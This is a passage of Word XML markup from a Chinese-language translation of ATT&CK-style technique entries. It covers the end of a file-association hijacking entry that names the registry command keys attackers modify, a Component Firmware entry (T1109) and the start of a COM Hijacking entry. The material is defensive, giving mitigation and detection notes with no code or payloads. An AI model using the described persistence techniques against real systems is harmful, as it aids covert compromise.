        <w:t>HKEY_CLASSES_ROOT\txtfile\shell\print\command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC2146" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所列键的值是处理程序打开文件扩展名时执行的命令。攻击者可以修改这些值来继续执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022540F1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A390E1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统功能的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法通过预防性控制来轻松缓解其</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>造成的影响</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DEF043" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B40BA3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集并分析注册表项（将文件扩展名与默认应用程序相关联以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的更改，并与未知的进程启动活动或该进程的异常文件类型相关联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F4920" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用户文件关联首选项存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>下，并覆盖在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[HKEY_CLASSES_ROOT]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>下配置的关联。用户首选项更改会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在此条目的子项下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57153374" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还要在异常进程调用树中查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与发现操作或其他技术相关的其他命令的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363D962" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>组件固件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="008C24DE" w14:paraId="535A6EE2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08976231" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>: T1109</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329EA042" w14:textId="046BC889" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A76CF22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF505F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能够从主机操作系统更新组件固件。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F1F066" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A070F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>磁盘取证，</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程监控，组件固件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26199901" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控、主机入侵防御系统、杀毒软件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0F91D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F5CB5CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B79AA5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00496AFF" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会使用复杂的方法来破坏计算机组件，并安装恶意固件，这些固件将在操作系统和主系统固件或</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之外执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码。此技术可能类似于系统固件，但在其他系统组件上执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时可能</w:t>
      </w:r>
      <w:r>
        <w:t>具备不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的完整性检查能力或级别。恶意设备固件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以提供对系统的持久访问，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这会</w:t>
      </w:r>
      <w:r>
        <w:t>导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00496AFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>维护访问和硬盘重映像的典型故障，也可以提供逃避基于主机软件的防御和完整性检查的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B47A9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00496AFF" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED0CE99" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B929D32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED04BF" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单</w:t>
      </w:r>
      <w:r>
        <w:t>地</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过预防性控制缓解，因为它基于系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特性</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A56A4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEBA500" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备驱动程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程和</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>SMART</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（自</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控、分析和报告技术）磁盘监控提供的数据和遥测可能会揭示组件的恶意操作。否则，由于恶意活动发生在系统组件上，可能超出操作系统安全性和完整性机制的权限，因此此技术可能难以检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125BE1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘检测工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会显示恶意固件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指标</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED04BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，例如字符串、意外的磁盘分区表条目，或者需要进一步调查的异常内存块。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以考虑将组件（包括组件固件和行为的散列）与已知的良好镜像</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3ABF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAD8C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F72A73" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455AB191" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3640E660" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435AE3C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>T1122</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E092C0" w14:textId="279A606A" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>逃逸，</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126A7A3D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E02944" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479BC488" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>，动态链接库监控，已加载动态链接库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCF8367" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>Autoruns</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF0D2C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>ENDGAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD2ACEE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72D2C863" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5E842A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（组件对象模型）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
